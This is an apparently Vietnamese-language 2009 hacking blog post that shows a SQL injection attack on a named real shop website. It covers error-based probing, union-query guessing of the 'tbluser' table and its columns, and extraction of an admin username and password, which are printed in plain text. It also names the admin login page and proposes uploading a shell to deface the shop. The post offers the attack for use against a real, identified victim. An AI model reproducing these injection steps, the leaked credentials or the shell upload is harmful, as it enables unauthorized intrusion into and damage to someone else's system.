hack shop ASP GOOD

site victim: http://hoffmans.co.za/shopdisplayproducts.asp?id=1%27

Quote:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘ccategory = 1′ Order By specialOffer DESC, cname’.

/shop$db.asp, line 831

Ta tiến hành khai thác và suy doán table nào đúng trong shop nhé !

Oh yeah ! ta có tbluser nằm trong shop roài !

Quote:

Products

Microsoft OLE DB Provider for ODBC Drivers error ’80004005′

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/shop$db.asp, line 831

Nếu mà như thế này AE phải tìm tablename khác cho chuẩn nha !

Quote:
Products

Microsoft OLE DB Provider for ODBC Drivers error ’80040e37′

[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ‘tbluse’. Make sure it exists and that its name is spelled correctly.

/shop$db.asp, line 831

Như vậy là đã không hack được lỗi này vì ko phải tablename cua shop :shower:

Ta khai thác tiếp lỗi ở phía trên nhé !

AE cứ thay đổi lần lượt từ 1,2,3…30 ! shop nay tìm đến column mới hiện ra column chứa username/password !

khai thác ra đây:

http://hoffmans.co.za/shopdisplaypro…from%20tbluser

Ta nhìn thấy :

Quote:
3

click to see more
4
22

21

Vậy ta tìm username/password ở cột số 3 nhé

http://hoffmans.co.za/shopdisplaypro…from%20tbluser

thay the : fldusername+’/'+fldpassword de lay user/pass admin nha !
OH hay thật có username/password của admin rồi đây :huncai:

Quote:
mike/sweet

bây giờ đi kiếm link admin để login nao

Quote:
http://hoffmans.co.za/shopadmin.asp

giờ thì chúng ta váo shop làm tình làm tội nó 1 tý ! up shell local chẳng hạn !

This entry was posted on Friday, December 11th, 2009 and is filed under Hack. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.